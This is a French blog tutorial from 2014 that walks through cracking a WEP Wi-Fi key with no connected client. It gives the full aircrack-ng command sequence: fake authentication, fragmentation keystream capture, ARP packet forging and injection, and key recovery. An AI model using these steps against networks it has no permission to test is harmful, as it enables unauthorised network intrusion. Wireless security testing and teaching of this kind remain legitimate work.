dimanche 6 juillet 2014

[Tuto] Crack clé WEP sans client

13:44 Posted by gamaran , , , , 1 comment
Petit rappel :  il est illégal de s'attaquer à un réseau sans-fils donc nous n'avons pas l'autorisation EXPLICITE du propriétaire.
Bonjour tout le monde(bonjour docteur nick)
Lorsque l'on veut tester la sécurité d'un réseau wep, il arrive que l'on aie pas la chance de trouver une station connecté. Alors je vais vous montrer comment faire pour cracker une clé WEP quand il n'y a aucun client de connecté. Je vous conseille le terminal terminator pour la procédure puisqu'il vous permet d'avoir plusieurs terminaux dans une même fenêtre.Sinon vous n'aurez qu'à ouvrir plusieur terminaux.
Pré-requis:
-La suite aircrack d'installé:
-Une carte wifi compatible avec le monitoring ET l'injection de packet;
-Une bonne dose de patience.
Informations de base:
Voici les informations de base que je vais utiliser pour mon tutoriel, il se peut que ce ne soit pas identique chez vous, mais sa devrait être assez semblable pour que vous vous retrouviez.
-La carte sans fils est sur l'interface wlan1;
-L’adresse mac de la carte est le 00:1b:b1:82:10:f6(adresse fictive);
-L'adresse mac de l'access point(routeur) est le 00:26:50:4f:37:39(adresse fictive);
-Le channel de l'acces point est 11;
Nous pouvons donc commencer.
Nous allons commencer par démarrer notre carte wifi en mode monitoring:
 airmon-ng start wlan1
Une fois la commande exécuté, nous avons une nouvelle interface (mon0) que nous allons utiliser pour nos attaques.
Nous allons donc monitorer notre access point dans le but de capturer les packets ivs pour cracker ensuite la clé, ainsi que l'activité qui s'y déroule.
airodump-ng --bssid 00:26:50:4f:37:39 -h  00:1b:b1:82:10:f6 --channel 11 -w monFichier --ivs mon0
Explications:
-bssid: l'adresse mac de l'access point;
-h : notre adresse mac(vous pouvez utiliser une adresse mac fictive, ou d'une station connu pour masquer la votre);
--channel : le channel sur lequel l'access point écoute;
-w monFichier: on va enregistrer les packets capturer dans monFichier;
--ivs: capturer seulement les ivs(ce sont les packets qui nous intéresse ici);
mon0 : notre interface;
Dans un nouveau terminal, nous allons maintenant lancé une attack de fake authentification, pour faire croire à l'access point que nous somme connecté sur lui.
 aireplay-ng -1 0 -a 00:26:50:4f:37:39 -h 00:1b:b1:82:10:f6 mon0
Explications:
-1 : Attack par fake authentification(avec l'option 0 pour dire tant que la procédure n'est pas complété tu réesseye);
-a : mac adresse de l'access point;
Une fois que l'attaque est réussi, vous verrez dans le premier terminal qui capture nos données, que notre adresse mac apparait dans la liste des stations connecté.
Maintenant, nous allons esseyer de capturer le keystream à l'aide de l'attack fragmentation.
aireplay-ng -5 -b 00:26:50:4f:37:39 -h 00:1b:b1:82:10:f6 mon0
L’attaque va lire les packet et esseye d'en trouver un que nous pourrons modifier et réinjecter par la suite. Lorsqu'il aura trouver un packet, il devra capturer des données pour avoir assez d'informations pour obtenir un keystream valide. Voici la question qu'il devrait vous poser:
         Size: 114, FromDS: 1, ToDS: 0 (WEP)
         
         BSSID  =  00:14:6C:7E:40:80
         Dest. MAC  =  01:00:5E:00:00:FB
         Source MAC  =  00:40:F4:77:E5:C9
         
         0x0000:  0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@.
         0x0010:  0040 f477 e5c9 6052 8c00 0000 3073 d265  .@.w..`R....0s.e
         0x0020:  c402 790b 2293 c7d5 89c5 4136 7283 29df  ..y.".....A6r.).
         0x0030:  4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b  N.^._CO..7?.M..;
         0x0040:  8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5  .DX...z.+.>...O.
         0x0050:  4563 906d 0d90 88c4 5532 a602 a8ea f8e2  Ec.m....U2......
         0x0060:  c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1  .1..+(...."m.qj.
         0x0070:  9c9f                                     ..
         
         Use this packet ? 
On répond oui(y), et on appuye sur enter. L'attaque va esseyer de capturer un keystream valide.
Lorsque l'attaque aura réussi, vous aurez une réponse semblable à :
 Saving chosen packet in replay_src-0203-180328.cap
 Data packet found!
 Sending fragmented packet
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 384 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 1500 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-0203-180343.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Si l'attaque échoue, elle cherchera un nouveau paquet pour essayer à nouveau.
Maintenant que nous avons un keystream valide, stocker dans le fichier fragment-0203-180343.xor, nous pouvons forger un packet que nous injecterons pour faire monter les ivs.
packetforge-ng -0 -a 00:26:50:4f:37:39 -h  00:1b:b1:82:10:f6 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arpRequest
Explications:
-0 : construire un packet ARP;
-k : mac adresse de destination(broadcast dans notre cas);
-l : mac adresse source(broadcast dans notre cas);
-y : fichier source contenant notre keystream;
-w :  écrire notre packet dans arpRequest;
Maintenant que nous avons notre packet, nous allons l'injecter pour faire augementer nos ivs.
aireplay-ng -2 -b 00:26:50:4f:37:39 -h 00:1b:b1:82:10:f6 -r arpRequest mon0
Explications:
-2 : attaque par injection de packets;
-r : packet à injecter;
Maintenant que nos ivs augmente, dans un troisième terminal, nous allons lancer aircrack qui tentera de décrypter notre clé(au format hexadecimal).
aircrack-ng monFichier-01.ivs
Aircrack prends en options le fichier créer par airodump, qui rajoute automatiquement -01.ivs(puisque nous capturons seulement les ivs) à la fin du fichier.Si vous relancer votre commande airodump plus d'une fois, le 01 va augmenter de 1 à chaque fois.
Si aircrack échoue à décrypter la clé,ce qui arrivera au début car nous n'avons pas assez de packets ivs de capturé, il va attendre la prochaine tranche de 5000 ivs et automatiquement, réessayer de cracker la clé. Il suffit d'attendre patiemment que la commande se termina d'elle même avec une jolie clé en format hexadécimal comme cadeau.Une fois que nous avons la clé, vous pouvez fermer les autres terminaux, ou faire ctrl+c dans chaque terminal pour stopper les commandes.
Et voilà ce n'était pas plus compliqué que sa. Si vous avez des question n'hésiter pas.
Si vous voulez utiliser la clé hexadécimal pour vous connecter au réseau, pensez à enlever les : qu'elle contient pour garder uniquement les chiffres.

1 commentaires:

John a dit…

intéressant:)